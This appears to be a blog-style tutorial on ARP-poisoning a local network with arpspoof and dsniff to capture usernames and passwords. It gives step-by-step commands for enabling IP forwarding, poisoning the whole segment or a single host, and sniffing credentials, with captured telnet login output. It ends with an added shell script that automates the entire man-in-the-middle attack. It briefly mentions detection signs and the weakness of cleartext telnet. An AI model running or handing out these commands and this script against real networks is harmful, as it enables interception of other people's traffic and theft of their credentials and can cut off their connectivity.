First we need to modify the repositories. I'm using sudo -i, which switches me to root so I don't have to type sudo before every command.
ubuntu@ubuntu:~$ sudo -i
root@ubuntu:~# vi /etc/apt/sources.list
I uncommented the following lines at the end of the file.
deb http://archive.ubuntu.com/ubuntu hardy universe
deb-src http://archive.ubuntu.com/ubuntu hardy universe
deb http://archive.ubuntu.com/ubuntu hardy-updates universe
deb-src http://archive.ubuntu.com/ubuntu hardy-updates universe
deb http://archive.ubuntu.com/ubuntu hardy-security universe
deb-src http://archive.ubuntu.com/ubuntu hardy-security universe
Then install dsniff:
root@ubuntu:~# apt-get -y install dsniff
Enabling IP forwarding lets the Ubuntu box pass the intercepted traffic on to the real router; without it we would effectively kill our target's internet connection. We don't want that: we want to forward the traffic and sniff it for usernames and passwords. Writing to /proc changes the setting immediately but is not persistent, so it reverts to 0 on reboot.
root@ubuntu:~# cat /proc/sys/net/ipv4/ip_forward
0
root@ubuntu:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@ubuntu:~# !cat
cat /proc/sys/net/ipv4/ip_forward
1
Now to poison everyone on our network. Without a target, arpspoof sends the forged replies to the broadcast address, so every host on the segment learns our MAC for the gateway and all of their outbound traffic flows through our machine. If your machine can't handle the traffic on this network segment, you could slow down or kill everyone's internet. arpspoof is part of the dsniff package.
root@ubuntu:~# arpspoof -i eth0 172.16.0.1
We could poison a single target instead, which is a bit more subtle, with the following:
root@ubuntu:~# arpspoof -i eth0 -t 172.16.0.10 172.16.0.1
You should see arpspoof print packets similar to the following (source MAC, destination MAC, ethertype 0806 for ARP, length, and the forged reply):
0:c:29:e5:f3:80 ff:ff:ff:ff:ff:ff 0806 42: arp reply 172.16.0.1 is-at 0:c:29:e5:f3:80
0:c:29:e5:f3:80 ff:ff:ff:ff:ff:ff 0806 42: arp reply 172.16.0.1 is-at 0:c:29:e5:f3:80
If I look at the ARP cache on my XP box:
C:\Documents and Settings\Administrator>arp -a
Interface: 172.16.0.10 --- 0x2
  Internet Address      Physical Address      Type
  172.16.0.1            00-0c-29-e5-f3-80     dynamic
  172.16.0.106          00-0c-29-e5-f3-80     dynamic
Notice that the router (172.16.0.1) now has the Ubuntu box's MAC address, the same MAC the cache already holds for 172.16.0.106. Two IP addresses resolving to one MAC is the classic sign of ARP poisoning, and it is what a victim (or an ARP watcher such as arpwatch) would look for.
Now we need something to sniff the traffic. This is where dsniff comes in. The flags: -c does half-duplex TCP stream reassembly, which is needed here because we only see one direction of each connection (the client's traffic toward the gateway); -m enables automatic protocol detection; -n stops dsniff from resolving IPs to hostnames; -i picks the interface.
root@ubuntu:~# dsniff -cmni eth0
dsniff: listening on eth0
-----------------
10/04/08 16:06:37 tcp 172.16.0.10.1805 -> 172.16.0.1.23 (telnet)
dj
test
ls
echo w00t
exit
The first line is the username (dj), the next is the password (test), and the rest are the commands I typed. One more reason you shouldn't use telnet: it's a cleartext protocol, so nothing is encrypted and anyone on the path can read the session exactly like this.
Press ctrl+c to kill arpspoof and dsniff. You'll notice arpspoof re-ARPs the target on exit, sending replies with the router's real MAC so the victim's cache is fixed and we don't break their internet. IP forwarding, however, stays enabled until you write 0 back to /proc/sys/net/ipv4/ip_forward.
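As an added example (not from the original post), the whole procedure wrapped in one script: it records the current forwarding flag, enables forwarding, starts arpspoof against the gateway (or a single target if one is given), runs dsniff in the foreground, and on ctrl+c stops arpspoof so it can re-ARP the victims and then restores the saved forwarding value. It assumes eth0 as in the post; IFACE and IP_FORWARD_FILE are overridable environment variables, the latter so the save/restore logic can be exercised against an ordinary file without root.

```shell
#!/bin/sh
# Added example wrapper around the arpspoof + dsniff procedure above.
# Not code from the original post. Assumes eth0 and the dsniff tools
# are installed; IP_FORWARD_FILE is overridable for testing.
set -u

IP_FORWARD_FILE="${IP_FORWARD_FILE:-/proc/sys/net/ipv4/ip_forward}"
IFACE="${IFACE:-eth0}"

# Current forwarding flag, "0" or "1".
read_forwarding() {
    cat "$IP_FORWARD_FILE"
}

# Turn forwarding on and echo the previous value so it can be restored.
enable_forwarding() {
    prev=$(read_forwarding)
    echo 1 > "$IP_FORWARD_FILE"
    echo "$prev"
}

# Put the flag back to the value enable_forwarding returned.
restore_forwarding() {
    echo "$1" > "$IP_FORWARD_FILE"
}

# $1 = gateway IP, optional $2 = single target IP (omit to poison the segment).
run_mitm() {
    gateway=$1
    target=${2:-}
    saved=$(enable_forwarding)
    spoof_pid=""
    # On ctrl+c: SIGTERM makes arpspoof send the corrective ARP replies
    # before exiting; wait for that, then restore the forwarding flag.
    trap 'kill ${spoof_pid:-} 2>/dev/null; wait ${spoof_pid:-} 2>/dev/null; restore_forwarding "$saved"; exit' INT TERM
    if [ -n "$target" ]; then
        arpspoof -i "$IFACE" -t "$target" "$gateway" &
    else
        arpspoof -i "$IFACE" "$gateway" &
    fi
    spoof_pid=$!
    # Half-duplex reassembly (-c) because we only see the client-to-gateway side.
    dsniff -c -m -n -i "$IFACE"
}

# Only start the attack when explicitly asked, so sourcing the file is safe.
case "${1:-}" in
    run) shift; run_mitm "$@" ;;
esac
```

Run it as root with `sh mitm.sh run 172.16.0.1` to poison the whole segment, or `sh mitm.sh run 172.16.0.1 172.16.0.10` for the single XP target from the post. The background arpspoof does not receive the terminal's ctrl+c directly, which is why the trap kills it explicitly rather than relying on the keystroke.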